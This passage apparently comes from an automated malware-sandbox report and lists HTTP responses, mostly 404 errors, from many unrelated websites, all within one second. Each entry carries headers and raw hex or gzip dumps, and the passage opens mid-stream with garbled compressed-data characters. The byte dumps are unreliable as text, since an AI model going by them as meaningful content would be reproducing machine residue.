443Vo6_E-gi&0l((Z:[L(R%F}w9ul7c)q~yrXj}gO~6#3K.&Vj}u%M%jYC+X50XP%xw8SF%5gkUNr/E}[EE%?Bh8\|n}WndP(a%\|ArLGq>ukq&:pKSMPp9;53vaeP]c<R5YFr#!VUL[XW<h#^V"i>X:7Rx6bydw~'W6\|[`D@tn[rTiZ"Mfd$\|^8I>:DY`
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Content-Length: 7939Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Set-Cookie: PHPSESSID=a67064cc4d9d44e1b7df5681b51c8062; path=/Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:12 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: NXZrOsfs/G2YibHOYData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:12 GMTContent-Length: 45173Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471572.408147780665912078Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalsoSJzyy0KqDQmXrJLlcagszbeeK9XHxfiHHgjePkg5s2Aaq70LSJGqAO5U/6dUqpQ==,2UNV7KOq4oGjA5+PKsX47K0eODJntj8FkQmv0QgFYbsfbJaKSXYQ/lskq2jK6SGP,O/1L7HVJdzQznP2rkpsRxjnWIsxCDt4gAQNDCnrR7Tg=,dn3KCFG1ABRFI3k8Pxb+UPKGhCOcg1Te7BjeKJn52gQ=,/j+AjfLiOiE0Vc9NsP8sK0UzapQezJmOE4ftHD8wysr02rOVQGO3V+wt2yp1bCcsW+nD4K+d/1sEfg+bm9SCNQ==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 97 d4 4e 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 79 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 89 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 ed 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b4 ea 3e 8f fe e2 1f de f3 2b 5b 37 32 28 94 b0 63 ce cd 75 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 9f 3b 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 31 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 ee 18 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 2b e8 7b 40 1e d9 9d 7f 91 05 72 78 c4 d7 ab 0e 6b 0d be 02 c0 d4 e9 ad 0f b0 0a a2 7b 20 3a b7 ef c0 ec 2d d9 e3 7b ae 69 e8 00 de b4 33 ad 0a 91 26 93 f4 3c 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 87 fa 33 d1 67 7e 36 b3 e5 9a 69 69 16 79 04 18 7f 4c Data Ascii: 443Vo6_E-N&0l((Z:[L(R%F}w9ql7c1q~ytXj}g~6#3.&juuM%jYC+X60XP%xw8QF%5'+UNr/E}EE%9\T!4>+[72(cuz9SAx;baI81\|T5;*vl:+{\l;rE+au[gBie5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x+{@rxk{ :-{i3&<@9Fc3g~6iiyL
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:12 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:EFAA_D5BA2104:0050_65D53514_D8C7:19A2x-iplb-instance: 51886Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 